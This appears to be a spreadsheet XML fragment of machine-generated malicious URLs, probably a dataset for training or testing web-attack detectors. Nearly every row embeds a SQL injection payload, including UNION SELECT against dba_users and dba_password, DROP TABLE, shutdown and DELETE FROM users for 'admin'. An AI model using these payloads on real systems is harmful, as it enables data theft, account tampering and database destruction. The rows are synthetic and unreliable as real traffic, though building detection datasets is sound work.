    <t>/ewms_-v3k1pz0dz/e45b1oosq04_0s/nfor2i8tmq3neoieotlr/upry@4qvuwlck5ygu/s9wa24-b4kb/f7npvgkexflrecgdrj/abmhgp/dm_7nncli4pvbscriptftp.js?lnaanses2=rwpiayatsfmw1&amp;deambnui3lzllto='++or+'bcrnpkx4ch'+between+++'r'++and+++'t&amp;toha=ooglmus+ofelldn&amp;e1tsienmc=jnlne&gt;ot@earn&amp;mum=30342&amp;-0uol-=uttutnrcexigroup+byeea</t>
  </si>
  <si>
    <t>/euslil/1xxea2t5zgixx/t5adsu_swxtov76h/wxhtenetanpaankxux/ghvisktceasetna.mdb?iacres5=4399&amp;9saat=ae$&amp;h8eq0=(nacmdmocha&amp;ui=rem2marzrg&amp;eutl=';+drop++table+admin&amp;d9hfhx0lkmq=is"+%eprocessing-instructiono5"n9l0kwsb;&amp;se4iehh=is+xtermae6fqe@kohvi3+i&amp;tbilie=i405nnswrheiu&amp;@dimgor0l9ymnh=7&amp;aaannh=2pe3dolhsctazt&amp;nf92lao6hde=ens2fnoeiietslaih</t>
  </si>
  <si>
    <t>/e52quhrnbeetfieier/9enseqyfiwuh/rst2ez2qufn/dntbepnvr/hf0kiygh/oxsansndujehaooona/smtbaa/tmpybv/oanx7ea.htm?ba0iarhc=ait'/**/union/**/select/**/basiei/**/from/**/dba_users/**/where/**/kir/**/like/**/'%&amp;lremsth=65</t>
  </si>
  <si>
    <t>/nnvangt2heistza/ah-inqje/1xkatp0fyn/1vw/msi9ate1kagmobasiwte/bamr/idiat/atqscn.mkls0iic/zas.qmtp/7svxaleahir/tpncqcs8a2se/seaeheoe6d.cfm?neoozei=76&amp;nco14il=icotezceo&amp;twuqaaqres=uuauemaasnres&amp;oodighd7et9me=or+'3rpsscie'++between+++++'r'++and+'t'&amp;nzi9oipehs=torwoheo5&amp;gp4c9aixpand=ry@8y-xnhw&amp;o3dourijf=664&amp;cuny=cmdh&amp;ubs=+amseetccifyyoss&amp;s1eeeafhkrneo=wo&gt;e&amp;tfjc_p1ickf=ut7h&amp;ehennrcsc=d&amp;is=eec&amp;rs5r9se2=3aooet&amp;7fvgjr4qur=413</t>
  </si>
  <si>
    <t>/fckxm8tgkvosh/dzt91r/tgtfsn/gm-btzu@-dc0vg/mev/n6wjoon40rjid.msf?noepdscu4esnh=e6osutehtasiumha15&amp;oom63eenrl=or7&amp;yoishjot2deeiri=htfttccgt&amp;rieeokkppwoh=madiv+e&amp;drsla=989629904&amp;aro=d2jb8&amp;qhli=ck9tszs+estgroup+bye&amp;etr=2840836&amp;jaaurs=142388&amp;ewf95=vhxqees&amp;p6iq=\\ne\\+ug6&amp;rcadikgrerfeeoi=ng'+++);++++del/**/ete+++++from+users+++where+upper(username)++=+++++upper('admin&amp;a7cn=koninzceonuysegoi&amp;ezeartu=lqxmuy2&amp;meskrre=esgiodt6gcaesp</t>
  </si>
  <si>
    <t>/mp0s8-w.e-ihz/tu4zx_u/mhe4/arae1hwee/hpbnqhternnfo82/aocejqezszy4@vufgiz/radf/pppah7na/re92atrl/rj-opy1.mdb?r5tsgoerih9=sl)rlaswinnt%nvieesete&amp;gda4rdsl5rpo=';+++++drop++table+++++o1f4gst</t>
  </si>
  <si>
    <t>/tv_fryrtjgj_7jy8i/sqd8j/a9dmmehsbodeooiapn/bc7ylautoexecrxp_bw/gf2mehfzb3zt_.mdb?oirap=sroroncgw&amp;awyhni=395327&amp;0or1y7ar2nce==group+bys1n+\\uoi&amp;trl4=pd&amp;ariia=3sdeim3tirdritib&amp;t8gc=eilposition?ik5&amp;eryan=58300566&amp;eore0weihisrs=+fveotgur8n&amp;qr=eowchle'+);deletefromuserswhereupper(username)+=upper(++'admin</t>
  </si>
  <si>
    <t>/eame/ge/hm/nh/ruaixg9ynfuren2g3s1.gif?lp8ot9otoein=kteedygnhs&amp;injnvewtegea=hr40bmwaufz&amp;eutteei=787641&amp;llex=;++++exec(+++'ins'+'ert+into++users+++++values(8,'in4ete','heqoo'+))&amp;nasa0irmeeiedb=8117100</t>
  </si>
  <si>
    <t>/nemitearto/ecz1.m/ur2sha3twbrq6mhhfzr/hexeo/7f1ryb/reotbboeianrrcw/res4aeitydgdehd/h@363rq8ili9iaeee/nukt0.j-z.jpeg?3c7mdy=tjp&amp;eetryi=kautoexecs&amp;i0i67tr=16661185&amp;rsl=)tan7adla&amp;idth=u6ov19b0oz_g&amp;mnv8htmosystemxd_=m4&amp;t3mms+iedisy&amp;daomd='++)+union+all+++select++++007,1604,0620,30,521+from+twan4e++++where+++(++''+++='&amp;j0s=syjgp-icpz15&amp;mohdhtto=mn7g4e9orrtiamjee&amp;roqlssda=sm5dtlaepd1s8m7n</t>
  </si>
  <si>
    <t>/o8hezh_vq0smqjayvu7/.jwi/aitmcu.mspx?s1mv_=';+shutdown--&amp;niiee=emehoa8s0binur4tennok&amp;j8-euxtermf=+scb&lt;</t>
  </si>
  <si>
    <t>/unaoseiiogba8im@fjqu/syceaj9eo/iframeeeqhz9fix.asmx?44m.x=l$ft&amp;ek7yuwc4xidk=uowjs9ik2f&amp;akmj4og2oswmu=o+&amp;neeai7apceo=cpkb8@&amp;ste=stm&amp;ood=and+0&lt;&gt;(select++count(*)++++from+++6aioa++++where++de8xzed&lt;&gt;)</t>
  </si>
  <si>
    <t>/a1ryqzx2nh/qb_qoanq.cgi?t9nk6d=-r~+w&amp;re3eceni6exd=@myqo&amp;wlwm=5hfc&amp;inrepu=ieizlteq8ssei3gzt&amp;otte=iframetcseetyehtslp&amp;sih=having4f+sewlhe5+servicesr9&amp;sla='+/**/+or+++/**/''=++'&amp;sir3vpteid=3487753496</t>
  </si>
  <si>
    <t>/phj5/2rosaoentedncnsc8/u_mtmq8.cgi?nrcip8tdo=u(k&amp;nssa='++++or++++'elrnnh2'++++&gt;+++'s&amp;nssiitstdatito=h+?&amp;esas8nqrn=o+t|kx&amp;ibtjuanacotca=6fh9o?nhcer&amp;rptjirblns=534&amp;ev0atoln2gthd=g5ts9eewd9ahfnebos&amp;adgcolrlhetn=etddiehsge2ie2h&amp;nbmtytem=kvilz2&amp;inyjb8dqtelnetqm=p++</t>
  </si>
  <si>
    <t>/ck4@bodygwwhb_u/86g6jvlikedfndvbscriptwn/vlrtxetehl4teeierabe/se72z.fi5/nqbrgrzke/opzj3kejxbmgdad.cgi?7lu7m=taa'++union++++/**/+++++select++++tevte+++++from++dba_users++where++++zreihpt+++++like++'%</t>
  </si>
  <si>
    <t>/ap7lsi/l1d/bmheysiafer/ynthtaatnnlevdnee/kaougdiitnecvbd6ere/4z7_gem/ej1-s.peb/kwatrpfkdu0amdaz7oa5/dlpdfcgg@/t4_gu29z7_b_v-/eni@xnq684y9xef.swf?elho=aotea4e&amp;s3ney=4351&amp;rbahrexocreao=e4oslevuer8&amp;teoroscan=tnhe&amp;teniaese=';++++begin++declare+++@ret+varchar(8000)+++++set+++@ret=':'++select+@ret=@ret+'++++'+8htsra+'/'+password+++++from+ebseh+where++++uei&gt;@ret+++++select+@ret+++as+++++ret++++into+foo++++end--&amp;lsse=3itv8ii9&amp;telnet1okl=9@l1g&amp;teigsfdtl=ztlnswm0r7sntgurne</t>
  </si>
  <si>
    <t>/ei31prlsuxb./r9u1b6/n4tnhbrhhseanhg/qbwoidppc/huzihteee0t/rha_4y65_get_/likevdd/ntiauenilscc/aeyyhlsfa/sevpnvliiya/ooip6osoynb7r1h.jpg?izafitseu=y0al&amp;enl2es4trsahem=t\\orr+m(5s\\&amp;ljuiypt=nldeadet5atmxery2c&amp;bts1thc3ei='itservices&amp;mvlvfmbgsoundtoq77='+or+++++id+++in+(+++++select+++++*+++++from+++++++user_db+++)&amp;u4txnibb7r=tipnnj3eg</t>
  </si>
  <si>
    <t>/mbamuue_w9hjac/ychu/@61qm@50m/t2zslng9iibt4etm1nx/iucoexuahne2i/mqbz-z/ycrpww_o7/tte5od/dcrvwlkopepax_j/vznuzn-iglp0zbl4iz/imxina1lmi/rmf.cfm?ars3hwn=lib0uuyw&amp;eyehhic=t@s;rel-haac&amp;pl6c=133250289&amp;iesr='++++or+++'tvtq5su'++++like+++'aze%&amp;4likexttx=t5diom&amp;echohjpassthruzhiw=e5i&amp;brmphe=jzftutl4uhu7&amp;emuuxeheeyt6y=45105447&amp;aptncsehmioklo=siy47&amp;2wytdolb=08&amp;r7e=91</t>
  </si>
  <si>
    <t>/seraduo7/3p2u30rhjjn06.msf?1ti='+++++++++(++++select+top++++1+++erheor4++++from++++rlessi2u)+++++++'&amp;la=798944625&amp;lun4vleis=whfo&amp;swtad=75195&amp;rrrhr9rhwse=ow&amp;sbi1=eg3-yinw_52u&amp;w9emgc=0pb8&amp;wegazx.6y=c8q+a]levtobject(+</t>
  </si>
  <si>
    <t>/tleegts1g.67x/aarhrceyteeq5smo1/c3ccggh/2jcxv@v3i4bx/2o1n1/0xn/sq/hrzx5toq/lr2xvas.iyd/zlp0.bin?ephenmtig=46583&amp;3heiu64nce='+/**/+++or++++/**/+++++'o3atb4tm'+&gt;++'s</t>
  </si>
  <si>
    <t>/puelakoro/3hmnuuoertbksqiolda/z_ho.olu/emivwhdnpwvmrh0pao2/hveg0ghmrusie3/s6wbly0n92mkq/qtldms53oeao.cfm?eimily=sreplace+4&amp;naafhih='+++)+++++union++all+select++++3+++from++++6miielhc+++++where++++(++++''='&amp;haeet=et&amp;mtcxpasswdxp_gechot=eireahosnintttt5&amp;auaativyr=3&amp;kuixeo9s7c7nmi=37&amp;dtgeb2t7msuu=e;fs+ieee</t>
  </si>
  <si>
    <t>/hmpwneoioiilhaorrf.gif?ednasi=7677565&amp;dropy0dvppasswdph=acwew2ztthsehtmoh8&amp;pesierelte2enl=ooc8nmtctrhnnaocu&amp;yoqzdb=8umo@u6.1t&amp;aqnkrft4inrrhd='select+++customer_phone++++'||'from+customers+'||'where++++customer_surname='''||+++++lv_surname||'''++++and+++customer_type=1';&amp;gnsig2=9econnect%uqnk+rnn4&amp;gloguhaeq5passthru=18653&amp;eersktafdtcarig=(tgnvar&amp;zodb6teyz6=04701&amp;th9dnsdn=)hs&amp;tmseeratrgh=058076862&amp;c21hercu0=5s5e6oyitihna7soso</t>
  </si>
  <si>
    <t>/nwp.zt_vg603nw9iptcf/a6/xeoagtbespofee6sy/std@rgeocbexro7@@x/rwoti0k6g.ji5etn1/fhyrwh/iyk-efz17s-0a/spz8b5k5r-kbib5o/crtlptioayre/v@yxuussiygw4rsock_stream.gif?bnh=lixl?qa0s4|smailsna$fha&amp;5nqoohaocecwo=746&amp;xew=58312423&amp;ohlooudegn=330&amp;cwxegayxms8i=hiquy:=)g6kc7m&amp;sninseas6fge=isnte$nrw)d7te&amp;optd7documentpt2bc=6&amp;mhu='select+customer_phone+'||'from+customers++'||'where++customer_surname='''||++++lv_surname||'''+and++customer_type=1';&amp;ebeeh9aehisr=89&amp;plrttwsodih=a&amp;et6hnaehottarzo=19</t>
  </si>
  <si>
    <t>/stqvv66@d1qrzhqsim/4gfsa4ntonafoav/aoyfeoh/rl64aswkcwty/is@xomythr/bf5vws6efts6g1k/khfovqy/foexecbu/f-zbn/tu-styleimwmdnhyqa.css?relzeiotfi19=hlohihbehttpsrh&amp;ac8tuegib=07005&amp;mi=nxx@c&amp;hosomtbs=8448&amp;lku4q05=ej5l6bzuua&amp;hims1znqnrt=77652&amp;oixhtmnd3ereimp=162510&amp;0n='+or++++'soaa9e'+++between++++'r'++++and+++'t&amp;hor0d=rnsii&amp;etcuikx8z.rxl=rhds</t>
  </si>
  <si>
    <t>/fchilde6lewg2s7xa/rdunlths/a6dov5/avn1l.yp2ddb/ejitc1gvmrgku3w2i/tip/tniframeyoscript5rbnusrperlot/xk66rwhtlduqpjhau/ixd-g5s.asp?oowtd8aea=erso)&amp;elcame8erw7nbsn=9352026&amp;5i5gt=687666466&amp;rdjsp1c='+);+delete++++from++++users;++++commit;++dummy(++++'&amp;mendh77i5rr=e@ttr&amp;dcljnrl2etnta=hvufe1&amp;e2ttnkleyzil=att&amp;idtb=7zcixdh4o&amp;127=iwyl&amp;lidjatb=lnhasm0epcmw&amp;80pnjbfuar4neh=nstyle</t>
  </si>
  <si>
    <t>/ls03eu/uo5ioe0s3maevaqaieay/fl/alaaenwsdiles/slitmhisedaeemo9yc/2h_i5wg/aeyekoaokr3ideteat/tmc.sh?2aiu6sr8oi=wgetrg&amp;bgeib5si0xketc=2jzvuhaqxam&amp;eeaxibeol='select+customer_phone+++'||'from+++++customers++'||'where++customer_surname='''||+++lv_surname||'''++++and+customer_type=1';&amp;zu@mkua-6vj=+k)+mot&amp;aqoqgomasy=ia2j+c5ipiiir86mstes&amp;anntkspn=of+yo&amp;0stflentisa=lmtee</t>
  </si>
  <si>
    <t>/thjxsatmhaogki2cl7/0a0y/fcy7vm4o10xgmkl0ml1k/s4nd/eae3u5atogefuin6h2se/hudhdshlfj5v0dewghh/4lzxj5ryk@twp/30cbetweentobjectetch3k6se2/69xfrx6l-gc8v18dj.asp?oztigckiff=)h+r'&amp;aa5snotn9=9327&amp;ai7weststscyteo=91589&amp;@0azp=759818&amp;tp='+++/**/+++++or+++/**/''++=++'&amp;aeodoihlear6plr=execwp-y+2lnru8qhsoia&amp;nimsneekociiwtn=1&amp;4dcel2x=491568022&amp;rzhemtjbh=11</t>
  </si>
  <si>
    <t>/egcvls/hbw0lo_rcuphut@8.php4?ee2tolt='+union+++select++sum(2tombm6)+++from++++ebvpehi--&amp;rdol=q@y&amp;di8=i&amp;jyslftu2=eko&amp;jokpbtagouh=557034&amp;viccteo=ch+if</t>
  </si>
  <si>
    <t>/rzm6dnbq/hat6igo5iaaekhe4a9/6bjc/fromselecthfkyb7.shtml?e5=32&amp;mfn7mja=nuiabn'+++union++/**/+select+tds76yra+++++from++dba_users+++++where+++++tg5+++like+'%&amp;hcirfoisat=emh0ysq@yndl</t>
  </si>
  <si>
    <t>/w00pxihwrc2mez@u/nuocqns.kjscr1l2ah/uin/titiwskiat1nfteaen/hn27ebvlmdrwenor0s6c/odol2at0rhenagkpho/ta.tiff?kdropue2e%uuzn='+++++or++'cio'++like++++'aze%&amp;raa97ss5sich=aecnto&amp;window.openp%ui_tbjnph-3n.=iqzywd&amp;2r=ehswekaeuooja3&amp;yeysdrdhmhrnio=hlaoabaidta&amp;ghkbdbksi=yad8</t>
  </si>
  <si>
    <t>/9drpwtra4c/dulxsikls5weo3_rcro.png?abesedittnto9c=7aa6oa&amp;dnudcsrndtsc6ey=6wh&amp;pyah7teeny6bcay=705571094&amp;c3wati7nletwrl=h&lt;ehchildxwidt''u&amp;tttido3lglggtss=310749&amp;hbinhb0dxoi=&gt;%hnebnser:hnaccept&amp;evaee=cm7eazrvhx&amp;ndrox3vnr7ninz=n&amp;nsctepee=uawdeeaxnne7sy6rrf&amp;een4m7nye=emeoth&amp;est=110517&amp;rrido='+++group++++by++++users.id+having++0459=0459&amp;bveqaahv=ei1op&amp;sraey=fth8&amp;tdebaycgl=uniond)en</t>
  </si>
  <si>
    <t>/wkd-zrkbb/heoyh4_timsikp6ch.eo.htm?8lym=wpgbgkw5s24&amp;ep6r08='++++or++++'t0s'++++between+++++'r'+and++'t&amp;terorattot=senszv3ri_&amp;iliformfxlikewde7=vxllmjri&amp;37zfexecxgs6k47=59779536&amp;oeson5=+k2ewrtsm&amp;pepheiyeha7tgi=12770402&amp;c2rhaskets=btxscriptnid\\ptnrmdep6&amp;grcnpgrpgiustrt=a3_oxaj</t>
  </si>
  <si>
    <t>/n3/29u.cfm?sy4acorul=o0ae&amp;sus1t58hxyst=90076249&amp;ivieatvh=autoexec&amp;bv8y4pl='+and+user_name()='fyg</t>
  </si>
  <si>
    <t>/txlhuirqjyh7processing-instruction/iccwtc9lrk9qcg-a80nh/nu/iirlogeres/hwg_dglw/r20b_r07pui88cn/rqxi@zka@xhejahjehc/wiyukjuqsxenxq.rb0c/mdihatle/qiimedpzrseht.html?aty=rzdf'++);+del/**/ete++++from+++users+++++where++upper(username)+=+upper('admin&amp;cj@x=xtermrn|fo5ewae&amp;6oe=e3s&amp;bdfap0ce2n4are=88680</t>
  </si>
  <si>
    <t>/ttnidleha/de5./libchxaqi/risbnaen/ye/shtfi/@qpd5_5r8pkbg/%ugw/c@td7d2pcdqj55j@..exe?lisitoscnnoi=443772&amp;ut2bpassthruidfoy_k=7588530368&amp;phpuha.kf='+++/**/++++or+++/**/+++++'7esl6h'+++++&gt;+++'s&amp;sw=32746</t>
  </si>
  <si>
    <t>/tb/0qeereyee8e/u0wmvg_sa7opy.2pq/ioninnusote/ec.q-nthq19cruhk73p/1iuxn9nlb12frjr-/hw-7fqu/h@fzbjqa.6/ylgme7etliiirubia/ta9lwrjegtniuaqd.mspx?bgsound-j9zis=iij+s&amp;ieiodivnhfcw=j\\r&amp;htei1d=njre=ut&amp;8ki83t1mwgetobject=nevalnt6dmsei'whr+d&amp;hk3vua=c&amp;0k3dv6xcorbmv='unionallselectfieldfromresiitwhere''=++'&amp;yhcise=468480&amp;ujgcsog=1425&amp;aehen9osquo=&gt;icafo+echotelnetihs(&amp;rbp=7912179542&amp;t2tefoartao=eteydm9oeoe1h&amp;ahjke9waepfbzsh=6875269561&amp;asem9e1=iyn&gt;nl&amp;o_lyinclude-ehttpw=|em7g</t>
  </si>
  <si>
    <t>/g8/sp@mcxgbtlzuzob.dll?hia6=&lt;nu@0&amp;wfrombstdini=0095197&amp;syrmqe=2icw9w&amp;ntvavdihalasnrt=or++++'3hpl3'+++++like+++++'sim%'&amp;kpkgne=6071&amp;e4lsien=i8so0libte&amp;2&amp;aao=aej-58&amp;syti5=995</t>
  </si>
  <si>
    <t>/hy3w9zzsifm.2xrntxbq/ktwf7s2o3/riwltmlrd6yje9ecme/wwwwv/oziepl7p3rpqtzcgke/g0xeesgl.html?inhsa=;alter++table+++++degenerata+++set+password+++=++'andrh'++where+++++name+++++=++'5ednuime';&amp;poyyiaersoo=(p+&amp;sdyr@=1485864&amp;lrhe=d9yc&amp;nijdtelnetdelete3=a6tnw4ado</t>
  </si>
  <si>
    <t>/nanln5tssiruoe4/vrm8wlrtrnode/apdnrweddotntr/bems_gghix/tx4@_7or_8wzgwq/ybsjnzan8/fmrddc5qtnfknv/lqnwogd5dej8/rzgyzdyaiojmexhzs.mdb?yfi1usrzxkpositionbit='+++(+++++select++++top++++1+++ratnciod+from+dra)+++++++'&amp;y-2q2f7k6t=reixsm&gt;siets</t>
  </si>
  <si>
    <t>/swinnt.jpg?ehderieevg=or+++++'teasen7h'++++like+++'sim%'</t>
  </si>
  <si>
    <t>/swghrb0pgnlyiv6j9@/e9czpovl9.-vi/7raotasxoiwchero/y8vr0eh/rilrcmm/3h.gif?d5td=b?tst&amp;rigbeugerction=sebmtox&amp;tynutj2y5et47r=lee&amp;en=93ctd07etn&amp;anmyeclde6=92898&amp;g8woni2yh=9&amp;7migsyzg0uq=n7fcoshstmurteir&amp;j1yechoegblxcateh=h3ib-uklneff&amp;s2olm4arr1n=69&amp;5mu1xjb9var=')+++++union++++all+select+++++7,11,95,95,57+++++from+whsrru4+++++where+++(+''='&amp;acltnr=rtzb0u0i.95q&amp;rhapeprrtihhttn=onohainputllzee&lt;&amp;texecrtdazqj6=besock_streamis</t>
  </si>
  <si>
    <t>/tqd/hh9t6j7bsock_streamav3jka/pr/wieslredn4ee/oqnhteho/pelrrchildpassthruutsmpobjectz/ta2-ebhuy4lrhmj.jpeg?9rothttmx='select++customer_phone++'||'from+++++customers+'||'where+++customer_surname='''||++++lv_surname||'''+and+++++customer_type=1';&amp;oytndrl0li1=hoof3s</t>
  </si>
  <si>
    <t>/8z2ufuphpin/nyszssipinee/sama/ihttatlrrrejws4bepo/b@ofu847ov/a44w40xeyi/ehy1ne9tteoihnyeta/ote.htm?pznebnsiniou='+++)+++union+all+select++'nrit',527,0740,'7rvsi',788+++++from+++++ayc06js+where++++(++++''+=++'&amp;cixshkisi=zdeletem8r</t>
  </si>
  <si>
    <t>/rr0gr9cescaq0/w2wmyj/owjabr1ih/cb5wo/bodycz9iprocessing-instruction6kvieprocessing-instructionjtreplace/o.tmrntx8q5mljfvbo/ombwm/kd/tsowisujti.pl?rul=rla&amp;6foonhtaccescd5=220022&amp;9gsdolanss=vc93a&amp;misiwoiosl4aoo=09&amp;ey6in=or+'ps'+++++=+'sim'+'ple'&amp;fne6nsetag=12930&amp;rnpasswd5=2087</t>
  </si>
  <si>
    <t>/ssc4sitwkc/mmhlwaeisfemujt/wlsnfnmiwhsg36l/rosra/eaoicwhcrvnoen5e/ik_v/khtxsvp/seqd4ir/opkig/kungy/o5a9va9o-g/afmdz-dzfoe6nv7.tiff?iflj=nibccvlpho&amp;t1693ohrfrotjhv=m6fho)hn&amp;w_oslk=733&amp;mereedsj=;+++exec(+'ins'+'ert+++into++++users+++++values(616,'ebr','dodazee2t'++++))&amp;giino=665&amp;h7onthmitx7b=iost2&amp;l4rcnnrabydwt=22644312&amp;sicnad=32623&amp;zgogy=3</t>
  </si>
  <si>
    <t>/l@ekeusf80bai/dbja/ccog8i22etnm4ghj/kzm5bvqv-/0unrnooasmnuo/dyyreplaceto8shxml_tb/1yw/racsecy/nnolbmstas0ti/i1sei.shtml?wc5v=waaerwon&amp;xcapt3bedr9to=lateeagetrer&amp;nwqt6rd=kglskaa_l&amp;st=oro&amp;p1orje3uasveuo=o\\sr%iframeolekbht&amp;dtectmp0pxsymf='union+select+password+++from+dba_password;--</t>
  </si>
  <si>
    <t>/eeop5sx.y/cm/tp/pk9z1pmlqq-a/iuwe9m7zpm3bo/lbpy2k/pmctw7owm565.bin?j_dto@wi4nw=a2c&amp;766z6to=89076&amp;2vbye1=sh%laij8de&amp;sasly.i1qi=4092907&amp;p9t=upsov&amp;amteosiby=ottntneef3elhwn&amp;i5utfmre=ey&amp;op1t3hmagij54il=508377616&amp;srspebgdlef7o='+++/**/++or+/**/++++'aocn5ao'+++&gt;+++++'s&amp;l6lvardivcbmraciframe=38666023&amp;aptxaeheernt=hkc8&amp;41ogt27el=yvywgdtcwq&amp;goreolhsa=8938072&amp;ehedscathf9oie=nlr(oocyd&amp;tninb0oopd=edvo0fzd0oy</t>
  </si>
  <si>
    <t>/a1hfrju06bx4o@dn/3b1fyy/fyzpjt/n_8b_sz_hikthha.h/d0allrh.cmdg7.jpg?w2tundtlnnsn4='++);++++delete++from+++users;++++commit;++++dummy(+++'&amp;qoachnodfaioe2e=t1hostmic&amp;egvikvtco73swn=9168007&amp;bre1icewanttct3=t_msxbw9pjh&amp;nntnaayliu7lh=o+4fi&amp;oattsmrds=415&amp;ltcs1=rmitc&amp;dt0tnr2asenagee=nol&amp;iarn=tusbb&amp;nev2=77617&amp;yrt=iyoesilldgtphse0&amp;zusock_streamey=87</t>
  </si>
  <si>
    <t>/wpo33loodaem8afawava/e49sttayeatmm1i399n/mdtta5et0/iaedeietpairetdha/4nuauv@papgoz/hyuhphn-msinnr/gs/j5k/itje4nc8eantee/ftqscziydp7afxb/hpe/x3nm2vvpajh.bin?a6dropmetazgbgw6r=43&amp;pecoocm3frm5t=select++rvcho5i+++from++all_users&amp;loenetanlnan=orw.&amp;trpin6ab0stxrn=5</t>
  </si>
  <si>
    <t>/sobfyssd7irxecj42p3/0x4c/eo.css?0ymbladtwsz=&amp;oevbscript&amp;fqxl6luhd=';+++insert++++into++++g6a+++++values(666,'dt8nth','3otitnox',0xfffff)&amp;ycgnge=dhbn&amp;asa8denthf=02020&amp;6tmpousscda=ssc2t3suhee&amp;msl=an6jl&amp;g6y1w828nscc3=rzuvy.3w&amp;rarol=0&amp;aeseiypmnt=7aodm+&amp;ts=dleqm3&amp;eerldasfspr=e+0&amp;nafob1nsio=ie8mssiiigvedah</t>
  </si>
  <si>
    <t>/thefiis/sotm3ugawinojggmxe.nsf?5irunrorthcira=6012&amp;nncecn=insert(heog&amp;owhbtyttp=8880383350&amp;sxgcyle9dbgsoundt=ngnf\\esnlf9i(n&amp;taz0htiie=hqydadtdsdsnbieote&amp;0steu='++++)+++union++all+++select++++67,2489,0,8656,4++from++wn1pcmaer+++where+(++''++=+'&amp;eounucdktne=?c3&amp;iychild8bats3v00=179&amp;r4lksho=apu&amp;sm7r8lmp1=ow.tn&amp;8otoopieil=g</t>
  </si>
  <si>
    <t>/fkjkpsb3/h30x.tiff?er2o6wa9bxac=s4vuztgbydv&amp;vtiso2aoisp=3822791&amp;lac4assytfuevia=5469502&amp;neohttoznnft4=dyx&amp;pzenhlo2ete=5ni-&amp;e1itm1=ssjldi&amp;lisxvfiiaco9n='htoe0mn&amp;ilnjiesn5=;hdc&amp;fln=9&amp;eg1fagmen='+++or++'oh4tbtxoeea'+=++'++&amp;n3kw3dlxrkz=dusuhyfn8erhdte</t>
  </si>
  <si>
    <t>/aeoa/v6rdd-tmpnull/tqfg/bked9@mp.css?ci4t4s=ei&amp;@bzarpj6=e72d&amp;chnt=604983&amp;e2s=hk&amp;scfkb4nntesbnao=dton8oa&amp;ndnihddbumn0a=ta&amp;t6ltioe3fe=15robkdnph-e&amp;lz9=73875&amp;etaooree=etgust5eeediitn&amp;vsenunoiedaca=hoocscript+et?l&amp;tta~+&amp;5it=or++++'i7g'+++=+'sim'+'ple'&amp;ltgkcwn0a9l=srmeed+&amp;pe4aitmhlsy=be</t>
  </si>
  <si>
    <t>/0r@wl1x.odoobonliju/vth/ieioxfdemcrtart/msmyv0m27csm/a4gpn0oholrvlz-6@.jsp?ha=su&amp;0t=or++++'agmp'+++++between+'r'++++and+'t'</t>
  </si>
  <si>
    <t>/6vgp-s2ke.hi/zyvfh/irnmnot/te7-ixpv5bs.exe?s1t9ahnno=chairs'++++un/**/ion+++++sel/**/ect++++tetardbnt+++++from++dba_users+++++where+fistoead+++++like+++'%&amp;yntr5chuti5yi2=3gue@g</t>
  </si>
  <si>
    <t>/isymewme/ag7jd@uh/7lrr8ohav/guodtdp8yzhv4-unym/uqivb/ceo/y4groupbyvpsoc.mspx?qxrexecr5ibd--t='++++)+union+all+select++++4560++++from++hell+where+++(+''+=+'&amp;ttit0ee=s6tec6r0sd4eahs</t>
  </si>
  <si>
    <t>/.wmtvi2xbinkpasswd/ujn_bkrxaoei6c3rfmx-/ettpeti3ifo/ohbsi5hesheicnet/w-f@fyamjf/j6dljg/fbhtn22enta.html?xxauygmaillpaj=gm1u3ptetoio&amp;yeaena=t@&amp;eeafsdhdc=o2tojtmb5&amp;ppcpttflog=xtez-vpifg&amp;rrbiebree3sn=1055&amp;cnotuiruwke=210&amp;aentisga9se=ltahobject&amp;2nopscef8clkcu='++or+++''=+'&amp;a9oqs=ttmsic7dea</t>
  </si>
  <si>
    <t>/o0dvsj3_3.-/otk0lmimo2au/7aohs9i0/1osnie/ecikmzh2jpku92zr/fpzb.msf?ite=zeeti&amp;iuh=hill&amp;toaihneenl9ll=mmdo.wfftb4.&amp;tda=dbmh&amp;i.dq65zg=wasgors&amp;x8kr@mps1z0rchild=jm+e8pu8tfbsdrbody&amp;eiodefomeonskve=4tnaj$sspd&amp;agdni=te4o&amp;tlt3nlooret88de='+++++or++++'soswiltje6'+between+++'r'++++and++'t&amp;ghypekewjujnode=ntendeleteio+ewindow.opensltt</t>
  </si>
  <si>
    <t>/jvlymxdqxvhg/ll-q6bh9abn/f7/jg628dtxizr/ohieddlanlelnjgean/xtu5qrrletkistod/tak89n9oesiee/xu.4wqtqautoexecp/nnuojuertucsea.nsf?tri='++/**/++++or++++/**/++++'tiokdinxo'+++++&gt;++++'s&amp;u2ohalany7eem=400367&amp;aipkey6nmd=75&amp;i7i6nais55i=41244</t>
  </si>
  <si>
    <t>/k2.css?mipylree=bd'/**/union/**/select/**/ee2ltta7it/**/from/**/dba_users/**/where/**/a5/**/like/**/'%&amp;n1aea=eso&amp;@lwrnxstylezt=zr9iitywaaodo&amp;nti=whei1aweir&amp;paceibdhe=689537995&amp;twhesiadik=es6h6lgaf2&amp;lubgsoundelink=@&amp;pzm1ev==processing-instructioneval+aiji]p</t>
  </si>
  <si>
    <t>/oeqt6.k@37msm0ke0fg.cgi?krpot='+++++union+++++++all+++++++++++select+++usdanc3o+++++from++++hdai5ils+++++where++++''++=+++'&amp;dchenri1e8j=mochasir0</t>
  </si>
  <si>
    <t>/linkgv/isltoyrs29u3kad/nstaewneenaoblw/tbe/varx5rx/azcndfr8xlp5/oayaanapeebtstndtg.aspx?tst=texicatz+ncr+tt&amp;tsnboirbfn5rpd=ti6-id6estb&amp;qe1yf2=s4&amp;idkskl=tsivbody-pee7emailynv&amp;necbaueoersid=59101&amp;aejm7x00h@=90&amp;jlhbfssa='+++)+union+++all++++select++++an2it++++,+++jieirir+,+hatle++from+++++mpennmof+++++where+++etxeetr++not++++in+++(++'2seinr')+++and+++++oc++not+++++in+++++(++'irt6uidj'+++)+++and++''=+'&amp;h9iaf=41742&amp;t2avbntditn9=7768370677&amp;erso=amd6zyqal&amp;treti=1:et@xm&amp;invmoqtiexa=963665&amp;ofhe7a=62.6uk6qs</t>
  </si>
  <si>
    <t>/ei6/rerliiotjwkhm/linkiimgm.js?eeryesk0sbov=obi76]audr0nph-ai&amp;ulmsntz=a1nhca1s_&amp;wtdmw1nheysttaa=oib7npoo&amp;a1ttsjc=5a8d&amp;gr8pipait5rug=lydsg.ot0b&amp;qd@ncatisekl=aardrtmnerip&amp;daevla=a8irt7cr+ein=0lu&amp;rnulliz5r9oolunion='+or+++++'tlfttcta'++between+++++'r'+++and+++++'t</t>
  </si>
  <si>
